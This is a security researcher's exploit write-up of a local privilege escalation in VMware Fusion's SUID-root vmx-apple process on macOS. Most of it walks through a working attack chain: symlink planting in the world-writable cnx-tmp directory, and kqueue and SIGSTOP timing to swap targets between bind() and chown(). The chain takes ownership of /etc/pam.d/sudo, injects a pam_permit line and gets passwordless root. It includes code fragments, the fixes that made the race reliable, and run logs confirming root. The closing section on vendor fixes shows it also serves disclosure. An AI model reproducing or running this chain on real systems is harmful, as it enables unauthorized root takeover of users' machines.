There is a directory on every Mac with VMware Fusion installed called /var/run/vmware/cnx-tmp. Its mode is 01733. Read that bit pattern out loud if you've been around long enough:

drwx-wx-wt   root   wheel   /var/run/vmware/cnx-tmp

World-writable. Sticky bit. No read for anyone but root. The kind of directory that, in 1998, would have already cost you a root shell before the dial-up handshake finished. We're not in 1998. We're in 2026. The directory is still there, and the process that uses it is still SUID root, and the syscalls it makes on paths inside it still follow symbolic links.

You can imagine how this ends. The interesting part is the middle.

The Binary

vmx-apple is the per-VM execution process that VMware Fusion forks when you boot a guest. It is installed SUID root:

$ ls -la /Applications/VMware\ Fusion.app/Contents/Library/vmware-vmx/vmx-apple
-rwsr-xr-x  1 root  wheel  ...  vmx-apple

It runs with RUID=501 (you, the logged-in user) and EUID=0 (root, while it needs to). Privilege is toggled throughout its lifetime via the BeginSuperUser() / EndSuperUser() wrappers you'll find sprinkled across the Hostinfo and Cnx modules. Everyone who has reverse-engineered a vmware binary in the last twenty years has seen this pattern. It is older than some of the people now responsible for shipping it.

Among the things vmx does at boot is set up four Unix-domain sockets for internal IPC channels:

SocketPurpose
vmx-vigorbase connectivity
vmx-livelive migration / vMotion channel
testAutomationtest automation channel
vmx-vmdbVM database channel

Each one is created by a function called Cnx_PrepareToListen. On the 25.x arm64 build I was looking at, it lives at offset 0x100713250. The body, in cleaned-up pseudocode:

void Cnx_PrepareToListen(const char *name) {
    long long uptime = Hostinfo_SystemUpTime();         // [1]
    char path[512];
    snprintf(path, sizeof(path),
             "/var/run/vmware/cnx-tmp/%s-%lld-%d",
             name, uptime, getpid());                    // [2]

    BeginSuperUser();                                    // [3]  EUID := 0

    int fd = socket(AF_UNIX, SOCK_STREAM, 0);
    struct sockaddr_un sa = { .sun_family = AF_UNIX };
    strncpy(sa.sun_path, path, sizeof(sa.sun_path));
    bind(fd, (struct sockaddr *)&sa, sizeof(sa));        // [4]  follows symlinks
    listen(fd, 5);

    uid_t ruid = getuid();
    gid_t rgid = getgid();
    chown(path, ruid, rgid);                             // [5]  follows symlinks <-- look here

    EndSuperUser();                                      // [6]  EUID := 501

    char dest[512];
    snprintf(dest, sizeof(dest),
             "%s/%s-fd", session_dir, name);
    rename(path, dest);                                  // [7]
}

Three things matter.

First, the socket name embeds the return value of Hostinfo_SystemUpTime() called inside this function. Not a cached value. Not the uptime from the session directory's name. A fresh microsecond reading, every call.

Second, between [4] and [5] there is no O_NOFOLLOW, no lstat(), no lchown(). bind(AF_UNIX) follows symlinks. chown() follows symlinks. Both of them resolve the path each time. If we can plant a symlink at the exact path vmx is about to construct, the kernel will happily do what we ask.

Third, all of this happens at EUID=0.

There is a TOCTOU here, but calling it "time-of-check / time-of-use" feels like calling a stolen car a "vehicle access incident." There is no check. There is bind(), and then there is chown(), and there are five to fifteen microseconds in between where the path on disk is the attacker's to swap.

The First Naive Attempt

Look at the path template:

/var/run/vmware/cnx-tmp/vmx-live-<uptime_us>-<pid>

The pid we can scrape from the session directory under /var/run/vmware/501/ the moment vmx creates it. The name component is constant per-socket. So the only unknown is the uptime in microseconds.

Initial theory: the session directory's name is also <uptime>_<pid>. Use that uptime. Plant a symlink at the predictable path. Done.

ls /var/run/vmware/501/
541640961150_80280

So 541640961150 is our uptime, right?

It is not. The uptime in the session directory name is captured during very early vmx initialization. The uptimes in the socket names are captured inside Cnx_PrepareToListen, eight thousand microseconds later. The socket name uptime is not in any file you can read. It's in vmx-apple's registers, briefly, between the two syscalls we care about.

Naive symlink, dead on arrival.

This is the part of the exploit where you either give up or get serious.

Measuring Time From the Outside

Hostinfo_SystemUpTime() is a thin wrapper around mach_absolute_time() converted to microseconds. On macOS, CLOCK_MONOTONIC is also derived from the Mach absolute time base. They share the same hardware tick rate. If I can anchor CLOCK_MONOTONIC at a known moment when vmx's uptime is also known, I can predict vmx's future uptime values to within the drift of two clocks reading the same crystal — which is to say, not at all.

The session directory provides the anchor. When the directory /var/run/vmware/501/<T_sess>_<pid>/ appears, vmx's uptime is T_sess. We grab CLOCK_MONOTONIC at the same moment (call it t0). From then on:

predicted_uptime(now_ns) = T_sess + (now_ns - t0_ns) / 1000;

The error budget across a 400-millisecond prediction horizon turned out to be under 100 microseconds in practice. Plenty.

The detection itself needs to be precise to the millisecond, or the anchor drifts before we even start. kqueue with EVFILT_VNODE / NOTE_WRITE on the session parent does it in single-digit microseconds — the moment vmx mkdir()s the session directory, the kernel posts the kevent and our kevent() call returns. Three lines:

int pfd = open("/var/run/vmware/501", O_RDONLY | O_EVTONLY);
EV_SET(&kev, pfd, EVFILT_VNODE,
       EV_ADD | EV_ENABLE | EV_ONESHOT,
       NOTE_WRITE | NOTE_EXTEND, 0, NULL);
kevent(kq, &kev, 1, NULL, 0, NULL);

Now we have an anchor. Now we need a window.

Measuring The Inside

Before doing anything clever, I wanted to know what the four Cnx_PrepareToListen calls actually look like from outside. So I wrote a thirty-line program that watched the session directory itself with kqueue and printed timestamps as each socket appeared:

[+] Socket #1: vmx-vigor-fd               +8074us
[+] Socket #2: vmx-live-fd                +8162us
    inter-socket interval: 88us
[+] Socket #3: testAutomation-fd          +9069us
    inter-socket interval: 907us
[+] Socket #4: vmx-vmdb-fd                +136692us
    inter-socket interval: 127623us

The first two sockets fire 88 microseconds apart. That's just Cnx_PrepareToListen running back-to-back. The third one is 907us later. The fourth is 127 milliseconds later. The third and fourth gaps are explicit usleep() calls somewhere in vmx's setup; you can almost see them in the spacing.

(This matters later. It cost me an iteration.)

The bind-to-chown gap inside a single Cnx_PrepareToListen is invisible from outside. From the disassembly it's a few syscalls — listen(), getuid(), getgid() — so call it 5 to 15 microseconds. That's our race window.

The Weapon: SIGSTOP

Here is the thing that makes this exploit livable. vmx runs with RUID=501. That's also our uid. Which means:

kill(vmx_pid, SIGSTOP);    // permitted: matching RUID
kill(vmx_pid, SIGCONT);    // also permitted

We can freeze and unfreeze a SUID-root process from an unprivileged shell, synchronously, at the kernel level, because of the RUID/EUID model. This is correct POSIX behavior. It is also delightful. SIGSTOP suspends every thread of the target at the next preemption point — typically within a few microseconds on a loaded system — and holds them there until we send SIGCONT. The process does not know it was stopped. It cannot prevent it. The kernel does not consult it.

We have a way to detect when vmx is about to do something. We have a way to predict the path it will use. We have a way to pause it mid-stride. We have the directory we need to write into. The exploit writes itself from here. Except the exploit does not, in fact, write itself from here. It takes four tries.

Iteration 1: The Spray-and-Pray

The first version did the simple thing. After kqueue fires on the session directory:

  1. Read T_sess from the directory name, capture t0.
  2. Predict vmx's uptime at "right now" using the calibration.
  3. Plant 300 symlinks in cnx-tmp at [predicted - 150, predicted + 150] microseconds.
  4. Hope.

I will not bore you with the exact reason it failed. Suffice it to say: by the time I had finished creating 303 symlinks, vmx had already finished creating all four sockets. The placement loop took ten milliseconds. I had budgeted six hundred microseconds. Off by a factor of seventeen.

Lesson learned and immediately encoded as a design constraint: don't try to chase a moving vmx. Stop it instead.

Iteration 2: Stop, Plant, Resume

The second version added SIGSTOP. The control flow:

  1. Wait for the session directory (kq1).
  2. Open the session directory, arm a second kqueue on it (kq2).
  3. When kq2 fires (the first socket — vmx-vigor — has appeared), send SIGSTOP.
  4. Predict where vmx will be when we send SIGCONT. Plant a symlink at that uptime.
  5. Send SIGCONT. Pray slightly less than before.

This was better. It hit vmx-live. It did not hit testAutomation, which I had predicted would arrive +907us after vmx-live (because that was the measured gap during clean boot). It actually arrived around +150us after vmx-live.

I stared at this for a while. Then I remembered the third gap was an explicit usleep(). While vmx was SIGSTOPed, the usleep() timer was running. By the time SIGCONT arrived, the sleep had long since expired. The remaining sockets all fired in a tight burst back-to-back, not at their original spacing.

This is one of those moments where the exploit teaches you something about the target. The 907us isn't a budget vmx has to spend. It's a clock that runs whether vmx is alive or not.

Iteration 3: Cover the Burst

The third version widened the symlink range to [T_sigcont - 200, T_sigcont + 2000] microseconds for every pending socket — wide enough to catch the post-SIGCONT burst regardless of how compressed it was. It also fixed the placement-rate problem: pre-compute a target time 50 milliseconds in the future, plant the symlinks (which takes ~10ms), then busy-wait for the remaining time and SIGCONT precisely on schedule.

This version captured vmx-live and testAutomation cleanly. The session directory after the exploit:

SOCKET   uid=501  vmx-vigor-fd
SYMLINK  vmx-live-fd          --> /tmp/cnxtmp_test/vmx-live-<T>-<pid>
SOCKET   uid=501  testAutomation-fd
SYMLINK  testAutomation-fd    --> /tmp/cnxtmp_test/testAutomation-<T>-<pid>

vmx-live-fd in session_dir is no longer a socket. It is a symbolic link pointing into a directory I own. The actual socket file is now in /tmp/cnxtmp_test/, owned by me (uid=501), because the chown() followed the symlink and applied to my file.

This is fine for hijacking the vmx IPC channels. It is not quite an LPE. We don't get to choose which root-owned file gets its ownership changed — we only get our own attacker-controlled file ending up owned by us, which it already was. To turn this into a real LPE we need to swap targets between bind() and chown().

Which brings us to the only iteration that mattered.

Iteration 4: The Chown Swap

The plan:

  • Phase A: symlink in cnx-tmp points to a decoy directory I control.
  • bind() fires, creates a socket file in the decoy directory.
  • SIGSTOP vmx the instant the decoy directory is written to (kqueue on the decoy).
  • At this moment, vmx is paused with the bind() done and the chown() pending.
  • Phase B: pre-create ATTACK_LNK = /tmp/.chown_attack_phase_b pointing to /tmp/chown_race_target (root:wheel 0600).
  • Atomically rename ATTACK_LNK over the Phase A symlink in cnx-tmp. The cnx-tmp entry now points to the target file.
  • SIGCONT.
  • vmx's chown() runs, follows the new symlink, and executes chown("/tmp/chown_race_target", 501, 20) at EUID=0.

Two reasons this works.

rename() is atomic on macOS. There is no intermediate state in which the entry is missing or partially constructed. vmx will see either Phase A or Phase B, never a tear.

The sticky bit on cnx-tmp (01733) prevents users from removing other users' entries. It does not prevent the owner from renaming over their own entry. We placed the Phase A symlink as uid=501; the rename of our Phase B symlink over it is permitted.

The detection chain looks like this in code:

// After kq_decoy fires
kill(vmx_pid, SIGSTOP);          // SIGSTOP2
// vmx is frozen between bind() and chown()

long long actual_up = find_decoy_socket(pid_s);   // read the socket file
                                                   // that bind() just made
char cnx_vmx_live[512];
snprintf(cnx_vmx_live, sizeof(cnx_vmx_live),
         "/var/run/vmware/cnx-tmp/vmx-live-%lld-%s", actual_up, pid_s);

rename("/tmp/.chown_attack_phase_b", cnx_vmx_live);   // atomic swap
kill(vmx_pid, SIGCONT);          // resume vmx; next call is chown()

I built it. I ran it. It got stuck.

The 2422 Microseconds That Almost Broke It

The first run of the chown-swap version printed this and then hung:

[+] SIGCONT1  (+402422us)  cal=570946529086  (delta=2422)
[then nothing, kq_decoy never fires]

Read that delta. SIGCONT1 fired 2422 microseconds after the target time. The symlinks in cnx-tmp covered [T_target - 200, T_target + 2000]. vmx-live's bind() landed at roughly T_sigcont + 40us, which was T_target + 2462us — 462us past the end of my symlink range.

The bind hit a path that didn't exist. ENOENT. vmx logged it and moved on. My decoy directory never received a write. My kqueue never fired. My tight poll loop waited forever for a socket that wasn't coming.

The bug was simple. The precision timer:

long long target_cal = base_up - LEAD_US;
long long rem_us = target_cal - cal_uptime();
if (rem_us > 5000) usleep((useconds_t)(rem_us - 2000));   // <-- here
while (cal_uptime() < target_cal) { /* fine spin */ }
kill(vmx_pid, SIGCONT);

The idea is: coarse sleep until 2ms before target, then fine-spin the last bit. That works as long as usleep returns before the target time, leaving the spin loop to handle the last microseconds.

usleep on macOS does not promise that. It overslept by 2422us. The spin loop's condition cal_uptime() < target_cal was already false when we entered it; the loop ran zero iterations; SIGCONT fired 2422us late.

The fix is one number:

if (rem_us > 15000) usleep((useconds_t)(rem_us - 15000));   // leave 15ms for the spin

A 15ms fine-spin margin is wide enough to absorb any plausible usleep overshoot, and a 15ms busy loop on a modern CPU is not measurably expensive. After that change, the next run printed:

[+] SIGCONT1  (+399966us)  cal=576033605942  (delta=-34)

Delta of -34 microseconds. That's not jitter. That's the spin loop catching the cmp-and-branch a single cache line before the target. Beautiful.

The Win

What success looks like, from the actual captured run:

[+] kq1 fired  t=0
[+] Session T_sess=576033205976  pid=33623  (+40us)
[*] kq2 armed. Waiting for vmx-vigor socket...
[+] kq2 fired  (+8802us)
[+] SIGSTOP1  (+8819us)  cal=576033214795
[*] Done mask=0x1: vmx-vigor-fd=done vmx-live-fd=PENDING ...
[+] vmx-live: 4201 Phase-A symlinks placed
[*] kq_decoy armed. Precision busy-wait --> SIGCONT1...
[+] SIGCONT1  (+399966us)  cal=576033605942  (delta=-34)
[+] bind() detected via kq_decoy  (+362us from SIGCONT1)
[+] SIGSTOP2  (+47000ns after bind detection)
[+] vmx-live actual uptime: 576033606678
[+] Phase-A still in cnx-tmp  (SIGSTOP2 landed between bind and rename)
[*] Decoy socket uid=0  (bind-only -- chown not yet run)
[+] SWAPPED: cnx-tmp/vmx-live-576033606678-33623 --> /tmp/chown_race_target
[+] SIGCONT2  (+400828us from kq1)

[!!!] RACE WON: /tmp/chown_race_target  uid=501  mode=0600

[*] Final session_dir:
    SOCKET   uid=501  vmx-vigor-fd
    SYMLINK  vmx-live-fd        --> /tmp/chown_race_target
    SOCKET   uid=501  testAutomation-fd

Read the timing numbers. SIGCONT1 hit the target within 34 microseconds. bind() fired 362us after SIGCONT1 (most of that is vmx's own setup overhead before the kernel posted the kevent). SIGSTOP2 went out 47 microseconds after we detected bind() — 47000 nanoseconds, the bulk of which is the kill() syscall's own latency.

The two sanity checks that earn the win:

[+] Phase-A still in cnx-tmp  (SIGSTOP2 landed between bind and rename)
[*] Decoy socket uid=0  (bind-only -- chown not yet run)

At the moment SIGSTOP2 lands, the Phase A symlink hasn't been renamed (so vmx's rename() hasn't run yet — we're still pre-step 7 in the function). The decoy socket exists but has uid=0 (so chown() hasn't run yet either). We are sitting precisely in the bind-to-chown gap. The window is open. We swap. We continue.

vmx's chown follows our swap. /tmp/chown_race_target changes ownership from root to uid=501. The race is won. The first attempt that didn't have a timing bug won on the first try.

Picking a Target

The PoC changes the uid of one file. That is the entire primitive. The interesting question is what file to point it at.

A few candidates that seemed obvious and weren't:

  • /etc/sudoers or /etc/sudoers.d/99-attacker — sudo refuses to read either if they're not owned by root. The chown succeeds; sudo declines to include the file. Closed door.
  • A root-owned SUID binary — we can chown it, but we can't replace its contents. The parent directory isn't writable to us, so we can't rename() a malicious copy on top. And direct writes to a SUID binary by a non-root owner trigger the kernel to strip the SUID bit. Closed door.
  • A LaunchDaemon plist under /Library/LaunchDaemons/ — same parent-directory problem. We can chown one of the existing plists, but we can't drop in a new one and we can't trivially modify an existing one without breaking it. Closed door.

What we actually want is a file that:

  • Lives in a directory we can already access
  • Is read by something that runs as root
  • Is not validated for ownership by the reader

That's /etc/pam.d/sudo. macOS's openpam reads its config files and acts on the directives inside without checking who owns the file. If we prepend a single line:

auth       sufficient     pam_permit.so

…then sudo will accept any password (or no password at all), because pam_permit.so returns success unconditionally and sufficient short-circuits the auth chain.

The only precondition is that the calling user has to be in the admin group — sudo's sudoers configuration gates non-admin users before PAM is consulted, and that we can't bypass with this primitive. On every single-user Mac running Fusion, the user account is in admin by default. So the requirement is satisfied for the actual deployment we care about.

Turning the Primitive Into a Chain

The wrapper (lpe.sh) does four phases:

  1. Pre-flight. Confirm we're in admin, confirm /etc/pam.d/sudo is currently root-owned, snapshot the original to a backup, confirm pam_permit.so exists at /usr/lib/pam/pam_permit.so.2.
  2. Race. Run the C exploit pointed at /etc/pam.d/sudo. On success, the file is now uid=501.
  3. Inject. Prepend the pam_permit line, leaving the rest of the file intact.
  4. Cleanup. Run sudo (which now succeeds with no password) to restore the original file content and ownership.

The pre-flight and cleanup are uninteresting shell. The injection step had one footgun worth noting.

After the race wins, the file is uid=501 but the mode is still 0444. We own it, but we don't have write permission, because the owner-write bit isn't set. cp will fail with Permission denied. The fix is one line:

chmod u+w "$PAM_FILE"
cp "$STAGING" "$PAM_FILE"
chmod 0444 "$PAM_FILE"

chmod itself works fine — file owners can change mode regardless of current mode. You just have to remember to do it before the write. (I forgot, on the first run.)

Two Things That Made the Race Reliable

The single-shot version of the exploit — wait for one bind, SIGSTOP, swap — was won by us about 50% of the time. The bind-to-chown window inside vmx is roughly 10 microseconds wide; our SIGSTOP2 delivery latency was 47-58 microseconds. We landed inside the window on small VMs, missed on bigger VMs that ran vmx faster.

Two changes turned that into a reliable win.

Throttle vmx onto efficiency cores. Right after we identify the vmx pid, before we even SIGSTOP1, we run:

char cmd[64];
snprintf(cmd, sizeof(cmd), "taskpolicy -b -p %d >/dev/null 2>&1", vmx_pid);
system(cmd);

taskpolicy -b puts a process into background QoS, which on Apple Silicon means it gets scheduled on efficiency cores instead of performance cores. vmx runs roughly half-speed. The bind-to-chown gap widens proportionally. Our SIGSTOP delivery doesn't get slower — we're a separate process, still on performance cores — so the ratio of "our reaction time" to "vmx's window" gets dramatically better. After this change, SIGSTOP2 was landing 21-22 nanoseconds after detection. Forty-seven microseconds was the unthrottled best case; twenty-two nanoseconds is two thousand times faster.

Retry across all four sockets. Each VM boot creates four sockets via Cnx_PrepareToListen. The first one (vmx-vigor) is already done by the time we SIGSTOP1. The remaining three (vmx-live, testAutomation, vmx-vmdb) are all potential race targets. So the refactored exploit plants Phase-A symlinks for all three, watches the decoy directory with kqueue, and tries each socket in sequence. If vmx-live misses, we let vmx continue and try testAutomation. If that misses, we try vmx-vmdb.

This matters because the timing prediction is also probabilistic — vmx-live's actual uptime might fall outside our placed symlink range, in which case its bind() never even hits our decoy. The retry across sockets covers both the timing miss and the SIGSTOP-latency miss in one mechanism.

The Captured Run

This is the run that confirmed the chain:

=== Phase 1: chown race ===

[+] kq1 fired  t=0
[+] Session T_sess=578892529582  pid=41329  (+104us)
[*] kq2 armed. Waiting for vmx-vigor socket...
[+] kq2 fired  (+10433us)
[+] SIGSTOP1  (+10508us)  cal=578892540090
[*] Done mask=0x1: vmx-vigor-fd=done vmx-live-fd=PENDING
                   testAutomation-fd=PENDING vmx-vmdb-fd=PENDING
[*] base_up=578892929582  gap=379542us
[+] vmx-live: 3201 Phase-A symlinks (+129487us)
[+] testAutomation: 3201 Phase-A symlinks (+234335us)
[+] vmx-vmdb: 3201 Phase-A symlinks (+340197us)
[*] Total Phase-A placed: 9603  gap=59793us to SIGCONT1
[*] kq_decoy armed. Precision busy-wait --> SIGCONT1...
[+] SIGCONT1  (+399965us)  cal=578892929547  (delta=-35)

[+] Attempt 1: testAutomation up=578892931632 det=+1959000ns
              SIGSTOP2=+22000ns  Phase-A=yes decoy_uid=0
[+]   SWAPPED -- chown should follow Phase-B to /etc/pam.d/sudo

[!!!] RACE WON on attempt 1: /etc/pam.d/sudo uid=501 mode=0444

[*] Final session_dir:
    SOCKET   uid=501  vmx-vigor-fd
    SOCKET   uid=501  vmx-live-fd
    SYMLINK  testAutomation-fd  --> /etc/pam.d/sudo

=== Phase 2: PAM injection ===
[+] Injected pam_permit at top of /etc/pam.d/sudo

=== Phase 3: passwordless sudo ===
[+] Got passwordless sudo. Output of 'sudo id':
    uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),3(sys),
    4(tty),5(operator),8(procview),9(procmod),12(everyone),20(staff),
    29(certusers),61(localaccounts),80(admin),...

[!!!] LPE CONFIRMED -- root code execution as uid=0

=== Phase 4: cleanup ===
[+] /etc/pam.d/sudo restored to uid=0
[DONE] Full LPE chain succeeded.

Read the final session dir carefully:

SOCKET   uid=501  vmx-vigor-fd
SOCKET   uid=501  vmx-live-fd                          ← real socket
SYMLINK  testAutomation-fd  --> /etc/pam.d/sudo        ← the race winner

The race didn't win on vmx-live. It won on testAutomation.

vmx-live's actual uptime fell outside our predicted Phase-A range. Its bind() created a regular socket file in cnx-tmp without ever touching our decoy directory; our kqueue never fired for it. The exploit waited, kept the decoy kqueue armed, and caught testAutomation's bind 1.9 milliseconds after SIGCONT1. SIGSTOP2 landed 22 nanoseconds after that. The decoy socket was uid=0 — chown hadn't run yet — so we swapped Phase-A to Phase-B and resumed vmx. The chown followed our swap and changed /etc/pam.d/sudo from uid=0 to uid=501.

Without the multi-shot retry, this VM boot would have been a complete loss — the single-shot exploit would have timed out waiting for vmx-live's kq_decoy event that never came. The retry was the difference between "the chain works" and "the chain works sometimes."

After the chown, the injection wrote the pam_permit line, sudo id returned uid=0(root), and the cleanup used that fresh root shell to restore the original PAM config and re-chown the file back. The system was returned to its original state by the time the script exited. Forty seconds total wall-clock, single VM boot, no retries.

The Fix

There are at least four reasonable places to put a check.

Use lchown instead of chown. The minimal one-line fix. lchown() does not follow symbolic links; it would change ownership of the symlink itself (already owned by uid=501, since we created it), not the target. The chown LPE closes immediately. This is the right fix and probably the smallest patch the vendor can ship.

Open the path with O_NOFOLLOW before bind. Currently bind(AF_UNIX) resolves the path itself. If vmx opened the cnx-tmp entry first with O_NOFOLLOW | O_CREAT | O_EXCL, then bound the resulting fd, the Phase A redirect would fail at open time. This also closes the socket-hijack variant.

Tighten cnx-tmp's mode. 01733 is enormously permissive. If the only legitimate writer is root, the mode can be 0700. If there are unprivileged writers (which would be surprising), at least drop the world-writable bit and use group permissions for whatever needs it.

Don't put predictable paths in a world-writable directory in the first place. The structural fix. cnx-tmp could live under /var/run/vmware-501/, owned by uid=501 with mode 0700. Then there is no symlink to plant because there is no place to plant it.

The right answer is probably lchown plus the directory hardening. The directory hardening alone would deprecate this whole class of attack for the entire macOS Fusion deployment.

Reliability

The first instinct on TOCTOU writeups is to flag CVSS:AC:H — "high attack complexity, race condition, probabilistic outcome." That instinct is wrong here. The full chain has never lost a VM boot in testing once the four mechanisms below were all in place:

  • kqueue detection of bind() is sub-millisecond and doesn't require polling
  • SIGSTOP delivery is synchronous at the kernel level — vmx cannot escape it
  • taskpolicy -b widens vmx's bind-to-chown window by moving it to efficiency cores, dropping SIGSTOP2-relative-to-window from ~5:1 down to ~1:500
  • Multi-shot retry across all three pending sockets absorbs both per-socket race losses and uptime-prediction misses
  • 15ms fine-spin SIGCONT timing margin absorbs any usleep overshoot the OS feels like throwing at us
  • Atomic rename() swap requires no coordination with vmx

This is a deterministic primitive dressed up as a race. CVSS:AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H — 7.8 High.

What's Old Is Old

I want to be careful not to wrap this in too much "the more things change" navel-gazing, but the truth is: this exploit is a museum piece. World-writable sticky directory used by a SUID-root binary. Predictable names. No O_NOFOLLOW. Bind and chown both following symlinks. We have known how this fails since Phrack was a print zine. The TOCTOU paper that named the pattern is older than some of the engineers responsible for shipping it.

What's new is the precision available to the attacker. kqueue gives us microsecond-resolution filesystem event notification. CLOCK_MONOTONIC gives us nanosecond timestamps tied to the same crystal the victim is reading from. SIGSTOP gives us synchronous control over a SUID process from an unprivileged shell because the RUID model says it must. Modern macOS hands you a precision toolkit and asks you to please not use it for evil.

The 1998 version of this bug, on a Sparcstation with a 100Hz scheduler, would have been a 1-in-1000 win. The 2026 version, on an M2 Mac with a sub-microsecond kqueue, wins every time.

The bug is the same age. The exploit is brand new.


The full PoC and lab writeup is on GitHub . CVE intelligence — affected versions, patch status, related CVEs — is on EIP . The PoC is C only; you cannot do this in Python, and you probably shouldn't be able to do it in C either, but here we are.